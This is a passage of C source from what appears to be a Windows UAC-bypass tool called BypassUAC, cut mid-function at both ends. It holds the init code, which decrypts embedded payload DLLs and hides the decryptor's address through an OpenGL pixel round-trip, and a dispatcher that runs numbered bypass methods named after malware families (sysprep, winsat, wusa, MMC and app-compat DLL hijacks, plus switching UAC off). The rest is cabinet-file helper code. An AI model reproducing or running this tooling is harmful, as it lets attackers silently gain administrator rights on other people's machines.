    MSG msg1;
    WNDCLASSEX wincls;
    HINSTANCE inst = GetModuleHandle(NULL);
    BOOL rv = 1;
    HWND TempWindow;
    HGLRC ctx;
    HDC dc1;
    int index;
#ifndef _DEBUG
    TOKEN_ELEVATION_TYPE ElevType;
#endif

    ULONG bytesIO, dwType;
    WCHAR szBuffer[MAX_PATH + 1];
    WCHAR WndClassName[] = TEXT("reirraC");
    WCHAR WndTitleName[] = TEXT("igakA");

    // Double-buffered RGBA format for the scratch window; the back buffer is
    // where the pointer bytes are drawn and read back.
    PIXELFORMATDESCRIPTOR pfd = {
        sizeof(PIXELFORMATDESCRIPTOR),
        1,
        PFD_DRAW_TO_WINDOW | PFD_SUPPORT_OPENGL | PFD_DOUBLEBUFFER | PFD_SWAP_EXCHANGE | PFD_GENERIC_ACCELERATED,
        PFD_TYPE_RGBA,
        32, 8, 0, 8, 0, 8, 0, 8, 0,
        0, 0, 0, 0, 0, 32, 0, 0,
        PFD_MAIN_PLANE, 0, 0, 0, 0
    };

    // do { ... } while (FALSE): "break" jumps to the single return below.
    do {

        //fill common data block
        RtlSecureZeroMemory(&g_ctx, sizeof(g_ctx));

        // dwType is set but not otherwise used in this function.
        dwType = 0;
        bytesIO = 0;
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);
        if (bytesIO == 0) {
            return ERROR_BAD_ARGUMENTS;
        }
        // One-argument strtoul: the project's own helper, not the CRT one.
        g_ctx.Method = strtoul(szBuffer);
        if (g_ctx.Method == 0 || g_ctx.Method >= UacMethodMax) {
            return ERROR_BAD_ARGUMENTS;
        }

#ifndef _DEBUG
        // Release builds insist on a limited (split) admin token, i.e. a UAC
        // admin running non-elevated; debug builds skip the check.
        ElevType = TokenElevationTypeDefault;
        if (supGetElevationType(&ElevType)) {
            if (ElevType != TokenElevationTypeLimited) {
                return ERROR_UNSUPPORTED_TYPE;
            }
        }
#endif

        wincls.cbSize = sizeof(WNDCLASSEX);
        wincls.style = CS_OWNDC;
        wincls.lpfnWndProc = &DummyWindowProc;
        wincls.cbClsExtra = 0;
        wincls.cbWndExtra = 0;
        wincls.hInstance = inst;
        wincls.hIcon = NULL;
        wincls.hCursor = (HCURSOR)LoadImage(NULL, MAKEINTRESOURCE(OCR_NORMAL), IMAGE_CURSOR, 0, 0, LR_SHARED);
        wincls.hbrBackground = NULL;
        wincls.lpszMenuName = NULL;
        wincls.lpszClassName = WndClassName;
        wincls.hIconSm = 0;
        RegisterClassEx(&wincls);

        // 30x30 topmost popup; its only job is to host the GL context.
        TempWindow = CreateWindowEx(WS_EX_TOPMOST, WndClassName, WndTitleName,
            WS_VISIBLE | WS_POPUP | WS_CLIPCHILDREN | WS_CLIPSIBLINGS, 0, 0, 30, 30, NULL, NULL, inst, NULL);


        //remember dll handles
        g_ctx.hKernel32 = GetModuleHandleW(T_KERNEL32);
        if (g_ctx.hKernel32 == NULL) {
            Result = ERROR_INVALID_HANDLE;
            break;
        }

        g_ctx.hOle32 = GetModuleHandleW(T_OLE32);
        if (g_ctx.hOle32 == NULL) {
            g_ctx.hOle32 = LoadLibraryW(T_OLE32);
            if (g_ctx.hOle32 == NULL) {
                Result = ERROR_INVALID_HANDLE;
                break;
            }
        }
        g_ctx.hShell32 = GetModuleHandleW(T_SHELL32);
        if (g_ctx.hShell32 == NULL) {
            g_ctx.hShell32 = LoadLibraryW(T_SHELL32);
            if (g_ctx.hShell32 == NULL) {
                Result = ERROR_INVALID_HANDLE;
                break;
            }
        }

        //query basic directories
        if (GetSystemDirectoryW(g_ctx.szSystemDirectory, MAX_PATH) == 0) {
            Result = ERROR_INVALID_DATA;
            break;
        }

        //query build number
        RtlSecureZeroMemory(&g_ctx.osver, sizeof(g_ctx.osver));
        g_ctx.osver.dwOSVersionInfoSize = sizeof(g_ctx.osver);
        if (!NT_SUCCESS(RtlGetVersion(&g_ctx.osver))) {
            Result = ERROR_INVALID_ACCESS;
            break;
        }

        // Anything older than the Windows 7 build range is refused.
        if (g_ctx.osver.dwBuildNumber < 7000) {
            Result = ERROR_INSTALL_PLATFORM_UNSUPPORTED;
            break;
        }

        g_ctx.IsWow64 = supIsProcess32bit(GetCurrentProcess());

        //flashes and sparks
        // Minimal GL setup: context on the window DC, clear, draw one triangle.
        dc1 = GetDC(TempWindow);
        index = ChoosePixelFormat(dc1, &pfd);
        SetPixelFormat(dc1, index, &pfd);
        ctx = wglCreateContext(dc1);
        wglMakeCurrent(dc1, ctx);
        glDrawBuffer(GL_BACK);
        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);
        glMatrixMode(GL_PROJECTION);
        glLoadIdentity();
        glBegin(GL_TRIANGLES);
        glColor4i(1, 0, 1, 0);
        glVertex2i(-1, -1);
        glVertex2i(0, 1);
        glVertex2i(1, -1);
        glEnd();
#pragma warning(disable: 4054)//code to data
        Ptr = (PVOID)&DecompressPayload;
#pragma warning(default: 4054)
        pDecryptPayload = NULL;
        // Pointer round-trip through the pixel pipeline: the raw bytes of Ptr
        // are uploaded as RGBA pixels and read back into pDecryptPayload.
        // sizeof(PVOID) / 4 bytes-per-pixel gives the pixel count per build.
#ifdef _WIN64
        glDrawPixels(2, 1, GL_RGBA, GL_UNSIGNED_BYTE, &Ptr);
        glReadPixels(0, 0, 2, 1, GL_RGBA, GL_UNSIGNED_BYTE, (GLvoid *)&pDecryptPayload);
#else
        glDrawPixels(1, 1, GL_RGBA, GL_UNSIGNED_BYTE, &Ptr);
        glReadPixels(0, 0, 1, 1, GL_RGBA, GL_UNSIGNED_BYTE, (GLvoid *)&pDecryptPayload);
#endif
        SwapBuffers(dc1);
        // WM_CLOSE -> DummyWindowProc posts WM_QUIT -> loop below ends.
        SendMessage(TempWindow, WM_CLOSE, 0, 0);

        do {
            rv = GetMessage(&msg1, NULL, 0, 0);

            // -1: GetMessage error; 0: WM_QUIT received.
            if (rv == -1)
                break;

            TranslateMessage(&msg1);
            DispatchMessage(&msg1);
        } while (rv != 0);

        UnregisterClass(WndClassName, inst);

        // Payload selection: the AVrf method gets the HIBIKI image, every other
        // method the FUBUKI image. pDecryptPayload is called unchecked here.
        switch (g_ctx.Method) {

        case UacMethodAVrf:
            g_ctx.PayloadDll = pDecryptPayload((PVOID)HIBIKIDLL, sizeof(HIBIKIDLL), &g_ctx.PayloadDllSize);
            break;

        default:
            g_ctx.PayloadDll = pDecryptPayload((PVOID)FUBUKIDLL, sizeof(FUBUKIDLL), &g_ctx.PayloadDllSize);
            break;
        }

        if (g_ctx.PayloadDll == NULL) {
            Result = ERROR_INVALID_DATA;
            break;
        }

    } while (cond);

    return Result;
}
252 |
/*
* ucmMain
*
* Purpose:
*
* Program entry point.
*
* Runs ucmInit, reports its failure codes to the user, then dispatches on
* g_ctx.Method in two passes: first a build-number gate (on builds where the
* method is expected to be fixed the user is asked via ucmShowQuestion(UACFIX)
* whether to continue, or the method is refused outright), then the method
* call itself, preceded in release builds by a per-method WOW64 check.
*
* Return:
*
*   ERROR_SUCCESS when the selected method reports success;
*   ERROR_INTERNAL_ERROR when ucmInit failed; ERROR_UNSUPPORTED_TYPE when a
*   gate refused the method; ERROR_ACCESS_DENIED otherwise.
*
* Notes:
*
*   - Neither switch has a default case, so a method value that matches no
*     case label in the second switch falls through to ERROR_ACCESS_DENIED.
*   - The usage text says "BapassUAC.exe" (a typo) and contains "\B", which is
*     not a standard C escape sequence; a literal backslash needs "\\". Both are
*     runtime strings and are left untouched here.
*   - The optional second command-line parameter is handed to supSetParameter
*     for every method except UacMethodRedirectExe, which receives it directly.
*
*/
UINT ucmMain()
{
    DWORD paramLen;
    WCHAR *pDllName;
    WCHAR szBuffer[MAX_PATH + 1];
    UINT uResult;

#ifdef GENERATE_COMPRESSED_PAYLOAD
    CompressPayload();
#endif
    uResult = ucmInit();

    // Translate ucmInit's failure codes into user-facing messages.
    switch (uResult) {

    case ERROR_UNSUPPORTED_TYPE:
        ucmShowMessage(TEXT("Admin account with limited token required."));
        break;

    case ERROR_INSTALL_PLATFORM_UNSUPPORTED:
        ucmShowMessage(TEXT("This Windows version is not supported."));
        break;

    case ERROR_BAD_ARGUMENTS:
        ucmShowMessage(TEXT("Usage: BapassUAC.exe [1-16] [OptionalParamToExecute]\n\nExample:\BapassUAC.exe 1 cmd.exe"));
        break;
    default:
        break;

    }
    if (uResult != ERROR_SUCCESS) {
        return ERROR_INTERNAL_ERROR;
    }

    //check OS version first
    // Build-number gates: ucmShowQuestion(UACFIX) lets the user override on
    // builds where the method is believed fixed; IDNO aborts.
    switch (g_ctx.Method) {

    case UacMethodSysprep1://cryptbase
        if (g_ctx.osver.dwBuildNumber > 9200) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case UacMethodSysprep2://shcore
        if (g_ctx.osver.dwBuildNumber != 9600) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case UacMethodSysprep3://dbgcore
        if (g_ctx.osver.dwBuildNumber != 10240) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case UacMethodOobe://oobe service
        if (g_ctx.osver.dwBuildNumber >= 10548) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case UacMethodRedirectExe:
        // 32-bit builds only; the 64-bit build refuses without asking.
#ifndef _WIN64
        if (g_ctx.osver.dwBuildNumber > 9600) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
#else
        ucmShowMessage(WOW64WIN32ONLY);
        return ERROR_UNSUPPORTED_TYPE;
#endif
        break;

    case UacMethodSimda:
        if (g_ctx.osver.dwBuildNumber >= 10136) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case UacMethodCarberp1:
        if (g_ctx.osver.dwBuildNumber >= 10147) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case UacMethodCarberp2:
        if (g_ctx.osver.dwBuildNumber >= 10147) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case UacMethodTilon:
        if (g_ctx.osver.dwBuildNumber > 9200) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case UacMethodAVrf:
        if (g_ctx.osver.dwBuildNumber >= 10136) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case UacMethodWinsat:
        if (g_ctx.osver.dwBuildNumber >= 10548) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case UacMethodShimPatch:
        // 32-bit builds only; the 64-bit build refuses without asking.
#ifndef _WIN64
        if (g_ctx.osver.dwBuildNumber > 9600) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
#else
        ucmShowMessage(WOW64WIN32ONLY);
        return ERROR_UNSUPPORTED_TYPE;
#endif
        break;

    case UacMethodMMC:
        // 64-bit builds only.
#ifndef _WIN64
        ucmShowMessage(WIN64ONLY);
        return ERROR_UNSUPPORTED_TYPE;
#endif
        break;

    case UacMethodSirefef:
        if (g_ctx.osver.dwBuildNumber >= 10548) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case UacMethodGeneric:
        //future use
        break;

    case UacMethodGWX:
        // Hard floor (no override prompt) below build 7600.
        if (g_ctx.osver.dwBuildNumber < 7600) {
            ucmShowMessage(OSTOOOLD);
            return ERROR_UNSUPPORTED_TYPE;
        }
        break;
    }

    //prepare command for payload
    paramLen = 0;
    RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
    GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &paramLen);
    if (paramLen > 0) {
        if (g_ctx.Method != UacMethodRedirectExe) {
            // &szBuffer is the address of the array itself; same pointer value
            // as szBuffer. Length is passed in bytes.
            supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR));
        }
    }


    //check environment and execute method if it met requirements
    // Second pass: per-method WOW64 refusal (release builds) and the call.
    switch (g_ctx.Method) {

    case UacMethodSysprep1:
    case UacMethodSysprep2:
    case UacMethodSysprep3:
    case UacMethodOobe:
    case UacMethodTilon:

#ifndef _DEBUG
        if (g_ctx.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif

        if (ucmStandardAutoElevation(g_ctx.Method, g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
            return ERROR_SUCCESS;
        }
        break;

    //
    // Allow only in 32 version.
    //
#ifndef _WIN64
    case UacMethodRedirectExe:
    case UacMethodShimPatch:
        // The raw second parameter goes straight to the method here.
        if (ucmAppcompatElevation(g_ctx.Method, g_ctx.PayloadDll, g_ctx.PayloadDllSize, (paramLen != 0) ? szBuffer : NULL )) {
            return ERROR_SUCCESS;
        }
        break;
#endif

    case UacMethodSimda:

#ifndef _DEBUG
        if (g_ctx.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        // Explicit confirmation: this method changes the UAC setting itself.
        if (MessageBox(GetDesktopWindow(),
            TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
            PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
        {
            if (ucmSimdaTurnOffUac()) {
                return ERROR_SUCCESS;
            }
        }
        break;

    case UacMethodCarberp1:
    case UacMethodCarberp2:

        if (g_ctx.Method == UacMethodCarberp1) {

            //there is no migmiz in syswow64 in 8+
            if ((g_ctx.IsWow64) && (g_ctx.osver.dwBuildNumber > 7601)) {
                ucmShowMessage(WOW64STRING);
                return ERROR_UNSUPPORTED_TYPE;
            }
        }

        if (g_ctx.Method == UacMethodCarberp2) {
#ifndef _DEBUG
            if (g_ctx.IsWow64) {
                ucmShowMessage(WOW64STRING);
                return ERROR_UNSUPPORTED_TYPE;
            }
#endif
        }

        if (ucmWusaMethod(g_ctx.Method, g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
            return ERROR_SUCCESS;
        }
        break;

    case UacMethodAVrf:
#ifndef _DEBUG
        if (g_ctx.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        if (ucmAvrfMethod(g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
            return ERROR_SUCCESS;
        }
        break;

    case UacMethodWinsat:
#ifndef _DEBUG
        if (g_ctx.IsWow64) {
            ucmShowMessage(LAZYWOW64UNSUPPORTED);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        // Target DLL name depends on the build; the last argument selects the
        // UseWusa variant (see the prototype in hybrids.h) for builds <= 10136.
        if (g_ctx.osver.dwBuildNumber < 9200) {
            pDllName = L"powrprof.dll";
        }
        else {
            pDllName = L"devobj.dll";
        }

        if (ucmWinSATMethod(pDllName, g_ctx.PayloadDll, g_ctx.PayloadDllSize, (g_ctx.osver.dwBuildNumber <= 10136))) {
            return ERROR_SUCCESS;
        }
        break;

    case UacMethodMMC:
#ifndef _DEBUG
        if (g_ctx.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        pDllName = L"elsext.dll";
        if (ucmMMCMethod(pDllName, g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
            return ERROR_SUCCESS;
        }
        break;

    case UacMethodSirefef:
#ifndef _DEBUG
        if (g_ctx.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        if (ucmSirefefMethod(g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
            return ERROR_SUCCESS;
        }
        break;

    case UacMethodGeneric:
#ifndef _DEBUG
        if (g_ctx.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        pDllName = L"ntwdblib.dll";
        if (ucmGenericAutoelevation(METHOD_SQLSRV_TARGETAPP, pDllName, g_ctx.PayloadDll, g_ctx.PayloadDllSize))
            return ERROR_SUCCESS;

        break;

    case UacMethodGWX:
#ifndef _DEBUG
        if (g_ctx.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        if (ucmGWX()) {
            return ERROR_SUCCESS;
        }
        break;

    }

    // Reached when the method failed or no case matched.
    return ERROR_ACCESS_DENIED;
}
590 |
/*
* main
*
* Purpose:
*
* CRT entry point: runs ucmMain, reports the outcome on the debugger output
* channel and terminates the process with ucmMain's result as exit code.
* The trailing return is never reached because ExitProcess does not return.
*
*/
int main()
{
    UINT uResult = ucmMain();

    OutputDebugString((uResult == ERROR_SUCCESS) ? RESULTOK : RESULTFAIL);
    ExitProcess(uResult);

    return 0;
}
608 |
--------------------------------------------------------------------------------
/BypassUAC/makecab.c:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015
4 | *
5 | * TITLE: MAKECAB.C
6 | *
7 | * VERSION: 1.60
8 | *
9 | * DATE: 20 Apr 2015
10 | *
11 | * Simplified Cabinet file support for makecab utility replacement.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #include "global.h"
20 | #include "makecab.h"
21 |
22 | #pragma comment(lib, "cabinet.lib")
23 |
24 | /*
25 | ** CAB Callbacks START
26 | */
27 |
/*
* fnFCIALLOC
*
* Purpose:
*
* FCI allocation callback: cb bytes from the process heap, zero-filled.
* Returns NULL when HeapAlloc fails.
*
*/
LPVOID DIAMONDAPI fnFCIALLOC(
    ULONG cb
)
{
    HANDLE hProcessHeap = GetProcessHeap();
    return HeapAlloc(hProcessHeap, HEAP_ZERO_MEMORY, cb);
}
34 |
/*
* fnFCIFREE
*
* Purpose:
*
* FCI free callback, counterpart of fnFCIALLOC. NULL is ignored because
* HeapFree does not accept it.
*
*/
VOID DIAMONDAPI fnFCIFREE(
    VOID HUGE *lpMem
)
{
    if (lpMem == NULL) {
        return;
    }
    HeapFree(GetProcessHeap(), 0, lpMem);
}
43 |
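/*
* fnFCIOPEN
*
* Purpose:
*
* FCI open callback: maps CRT-style oflag bits onto CreateFileA.
*   _O_RDWR   -> GENERIC_READ | GENERIC_WRITE
*   _O_WRONLY -> GENERIC_WRITE
*   otherwise -> GENERIC_READ
*   _O_CREAT  -> CREATE_ALWAYS, otherwise OPEN_EXISTING
* The file is opened with FILE_SHARE_READ only; pmode and pv are unused.
*
* Return:
*
*   The file handle as INT_PTR, or (INT_PTR)INVALID_HANDLE_VALUE on failure.
*   On failure *err receives GetLastError() when err is not NULL — the same
*   guard the other callbacks in this file apply (the previous version wrote
*   through err unconditionally).
*
*/
INT_PTR DIAMONDAPI fnFCIOPEN(
    LPSTR pszFile,
    int oflag,
    int pmode,
    int FAR *err,
    void FAR *pv
)
{
    HANDLE hFile = NULL;
    DWORD dwDesiredAccess = 0;
    DWORD dwCreationDisposition = 0;

    UNREFERENCED_PARAMETER(pv);
    UNREFERENCED_PARAMETER(pmode);

    if (oflag & _O_RDWR) {
        dwDesiredAccess = GENERIC_READ | GENERIC_WRITE;
    } else if (oflag & _O_WRONLY) {
        dwDesiredAccess = GENERIC_WRITE;
    } else {
        dwDesiredAccess = GENERIC_READ;
    }

    if (oflag & _O_CREAT) {
        dwCreationDisposition = CREATE_ALWAYS;
    } else {
        dwCreationDisposition = OPEN_EXISTING;
    }

    hFile = CreateFileA(pszFile,
        dwDesiredAccess,
        FILE_SHARE_READ,
        NULL,
        dwCreationDisposition,
        FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        // err is optional for every callback in this file; do not dereference NULL.
        if (err) {
            *err = GetLastError();
        }
    }

    return (INT_PTR)hFile;
}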
87 |
/*
* fnFCIREAD
*
* Purpose:
*
* FCI read callback: reads up to cb bytes from the file handle hf into memory.
* Returns the number of bytes read, or (UINT)-1 on failure with *err set to
* GetLastError() when err is not NULL. pv is unused.
*
*/
UINT DIAMONDAPI fnFCIREAD(
    INT_PTR hf,
    void FAR *memory,
    UINT cb,
    int FAR *err,
    void FAR *pv
)
{
    DWORD dwBytesRead = 0;

    UNREFERENCED_PARAMETER(pv);

    if (ReadFile((HANDLE)hf, memory, cb, &dwBytesRead, NULL)) {
        return dwBytesRead;
    }

    if (err) {
        *err = GetLastError();
    }
    return (DWORD)-1;
}
108 |
/*
* fnFCIWRITE
*
* Purpose:
*
* FCI write callback: writes cb bytes from memory to the file handle hf.
* Returns the number of bytes written, or (UINT)-1 on failure with *err set
* to GetLastError() when err is not NULL. pv is unused.
*
*/
UINT DIAMONDAPI fnFCIWRITE(
    INT_PTR hf,
    void FAR *memory,
    UINT cb,
    int FAR *err,
    void FAR *pv
)
{
    DWORD dwBytesWritten = 0;

    UNREFERENCED_PARAMETER(pv);

    if (WriteFile((HANDLE)hf, memory, cb, &dwBytesWritten, NULL)) {
        return dwBytesWritten;
    }

    if (err) {
        *err = GetLastError();
    }
    return (DWORD)-1;
}
129 |
/*
* fnFCICLOSE
*
* Purpose:
*
* FCI close callback. Returns 0 on success, -1 when CloseHandle fails
* (then *err receives GetLastError() if err is not NULL). pv is unused.
*
*/
int DIAMONDAPI fnFCICLOSE(
    INT_PTR hf,
    int FAR *err,
    void FAR *pv
)
{
    UNREFERENCED_PARAMETER(pv);

    if (CloseHandle((HANDLE)hf)) {
        return 0;
    }

    if (err) {
        *err = GetLastError();
    }
    return -1;
}
148 |
/*
* fnFCISEEK
*
* Purpose:
*
* FCI seek callback: moves the file pointer of hf by dist relative to
* seektype (the CRT origin constants, which match SetFilePointer's move
* method values). Returns the new position, or -1 on failure with *err set
* to GetLastError() when err is not NULL. pv is unused.
*
*/
long DIAMONDAPI fnFCISEEK(
    INT_PTR hf,
    long dist,
    int seektype,
    int FAR *err,
    void FAR *pv
)
{
    INT newPosition;

    UNREFERENCED_PARAMETER(pv);

    // No high-order part is passed, so a result of -1 can only mean failure.
    newPosition = SetFilePointer((HANDLE)hf, dist, NULL, seektype);
    if ((newPosition == -1) && err) {
        *err = GetLastError();
    }
    return newPosition;
}
170 |
/*
* fnFCIDELETE
*
* Purpose:
*
* FCI delete callback. Returns 0 on success, -1 when DeleteFileA fails
* (then *err receives GetLastError() if err is not NULL). pv is unused.
*
*/
int DIAMONDAPI fnFCIDELETE(
    LPSTR pszFile,
    int FAR *err,
    void FAR *pv
)
{
    UNREFERENCED_PARAMETER(pv);

    if (DeleteFileA(pszFile)) {
        return 0;
    }

    if (err) {
        *err = GetLastError();
    }
    return -1;
}
189 |
/*
* fnFCISTATUS
*
* Purpose:
*
* FCI progress callback. Nothing is reported; always returns 0.
*
*/
long DIAMONDAPI fnFCISTATUS(
    UINT typeStatus,
    ULONG cb1,
    ULONG cb2,
    void FAR *pv
)
{
    (void)typeStatus;
    (void)cb1;
    (void)cb2;
    (void)pv;

    return 0; //not implemented
}
204 |
/*
 * fnFCIFILEPLACED
 *
 * FCI "file placed in cabinet" notification.  Nothing is tracked per
 * placed file, so the arguments are ignored and 0 is returned.
 */
int DIAMONDAPI fnFCIFILEPLACED(
    PCCAB pccab,
    LPSTR pszFile,
    long cbFile,
    BOOL fContinuation,
    void FAR *pv
)
{
    (void)pccab;
    (void)pszFile;
    (void)cbFile;
    (void)fContinuation;
    (void)pv;

    return 0; // no per-file bookkeeping
}
221 |
/*
 * fnFCIGETOPENINFO
 *
 * FCI "open source file" callback: opens pszName read-only through
 * fnFCIOPEN and reports its DOS date/time (from the creation time,
 * converted to local time) and attributes.
 *
 * Returns the open handle as INT_PTR, or the INVALID_HANDLE_VALUE
 * equivalent (-1) when the file cannot be opened or described.  err is
 * forwarded to fnFCIOPEN / fnFCICLOSE, which fill it on failure.
 */
INT_PTR DIAMONDAPI fnFCIGETOPENINFO(
    LPSTR pszName,
    USHORT *pdate,
    USHORT *ptime,
    USHORT *pattribs,
    int FAR *err,
    void FAR *pv
)
{
    HANDLE hFile;
    FILETIME ftLocal;
    BY_HANDLE_FILE_INFORMATION fi;
    BOOL bHaveInfo;

    hFile = (HANDLE)fnFCIOPEN(pszName, _O_RDONLY, 0, err, pv);
    if (hFile == INVALID_HANDLE_VALUE) {
        return (INT_PTR)hFile;
    }

    bHaveInfo = GetFileInformationByHandle(hFile, &fi)
        && FileTimeToLocalFileTime(&fi.ftCreationTime, &ftLocal)
        && FileTimeToDosDateTime(&ftLocal, pdate, ptime);

    if (!bHaveInfo) {
        // Cannot describe the file: give the handle back and report failure.
        fnFCICLOSE((INT_PTR)hFile, err, pv);
        return (INT_PTR)INVALID_HANDLE_VALUE;
    }

    // Only the four classic DOS attribute bits are meaningful to FCI.
    *pattribs = (USHORT)(fi.dwFileAttributes & (
        FILE_ATTRIBUTE_READONLY |
        FILE_ATTRIBUTE_HIDDEN |
        FILE_ATTRIBUTE_SYSTEM |
        FILE_ATTRIBUTE_ARCHIVE
        ));

    return (INT_PTR)hFile;
}
260 |
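/*
 * fnFCIGETTEMPFILE
 *
 * FCI temporary-file-name callback: produces a unique name in the
 * process temp directory (prefix "emcau") and copies it into
 * pszTempName, which holds cbTempName bytes.
 *
 * GetTempFileNameA with uUnique == 0 creates the file as a placeholder;
 * FCI only wants a name it can create itself, so the placeholder is
 * removed again before the name is handed back.
 *
 * Returns TRUE on success, FALSE when the output buffer is unusable or
 * the temp path / temp name cannot be obtained.  pv is unused.
 */
BOOL DIAMONDAPI fnFCIGETTEMPFILE(
    char *pszTempName,
    int cbTempName,
    void FAR *pv
)
{
    CHAR szTempPath[MAX_PATH];
    CHAR szTempFile[MAX_PATH];
    SIZE_T cch;

    UNREFERENCED_PARAMETER(pv);

    // A NULL or non-positive buffer would otherwise turn into a huge SIZE_T below.
    if (pszTempName == NULL || cbTempName <= 0) {
        return FALSE;
    }

    if (GetTempPathA(MAX_PATH, szTempPath) == 0) {
        return FALSE;
    }
    if (GetTempFileNameA(szTempPath, "emcau", 0, szTempFile) == 0) {
        return FALSE;
    }

    // Delete the placeholder *file*, not the temp directory path.
    DeleteFileA(szTempFile);

    cch = (SIZE_T)cbTempName / sizeof(CHAR);
    _strncpy_a(pszTempName, cch, szTempFile, _strlen_a(szTempFile));

    return TRUE;
}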
285 |
/*
 * fnFCIGETNEXTCABINET
 *
 * FCI "next cabinet" callback.  Multi-cabinet sets are not supported, so
 * FALSE is always returned and the arguments are ignored.
 */
BOOL DIAMONDAPI fnFCIGETNEXTCABINET(
    PCCAB pccab,
    ULONG cbPrevCab,
    void FAR *pv
)
{
    (void)pccab;
    (void)cbPrevCab;
    (void)pv;

    return FALSE;
}
298 |
299 | /*
300 | ** CAB Callbacks END
301 | */
302 |
/*
 * cabCreate
 *
 * Purpose:
 *
 * Allocate a CABDATA object for the cabinet lpszCabName and open an FCI
 * context on it.
 *
 * Returns NULL when the name is NULL, cannot be converted to ANSI, the
 * heap allocation fails, or FCICreate fails (the FCI error record lives
 * inside the object and is lost together with it).  The caller releases
 * the result with cabClose.
 */
CABDATA *cabCreate(
    _In_ LPWSTR lpszCabName
)
{
    CHAR szCabName[CB_MAX_CABINET_NAME];
    PCABDATA pCab;
    int cbConverted;

    if (lpszCabName == NULL) {
        return NULL;
    }

    // ANSI copy of the name; two bytes are held back for the terminator.
    RtlSecureZeroMemory(szCabName, sizeof(szCabName));
    cbConverted = WideCharToMultiByte(CP_ACP, 0, lpszCabName, -1, szCabName, CB_MAX_CABINET_NAME - 2, 0, NULL);
    if (cbConverted == 0) {
        return NULL;
    }

    pCab = (PCABDATA)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(CABDATA));
    if (pCab == NULL) {
        return NULL;
    }

    // szCab may be a full path or a bare name (then relative to the current directory).
    _strcpy_a(pCab->cab.szCab, szCabName);

    // Maximum cabinet size in bytes.
    pCab->cab.cb = 0x7FFFFFFF;

    pCab->hfci = FCICreate(&pCab->erf,
        fnFCIFILEPLACED,
        fnFCIALLOC,
        fnFCIFREE,
        fnFCIOPEN,
        fnFCIREAD,
        fnFCIWRITE,
        fnFCICLOSE,
        fnFCISEEK,
        fnFCIDELETE,
        fnFCIGETTEMPFILE,
        &pCab->cab,
        NULL);

    if (pCab->hfci != NULL) {
        return pCab;
    }

    HeapFree(GetProcessHeap(), 0, pCab);
    return NULL;
}
357 |
/*
 * cabAddFile
 *
 * Purpose:
 *
 * Insert given file to the previously initialized cabinet object.
 *
 * lpszFileName is the file to read, lpszInternalName the name it gets
 * inside the cabinet.  Both are converted to ANSI first; a NULL or
 * unconvertible name makes WideCharToMultiByte fail and the function
 * return FALSE.  Files are stored uncompressed (tcompTYPE_NONE;
 * tcompTYPE_MSZIP would be the compressed alternative).
 *
 * Returns the result of FCIAddFile, FALSE on any earlier failure.
 */
BOOL cabAddFile(
    _In_ CABDATA *Cabinet,
    _In_ LPWSTR lpszFileName,
    _In_ LPWSTR lpszInternalName
)
{
    CHAR szSource[CB_MAX_FILENAME];
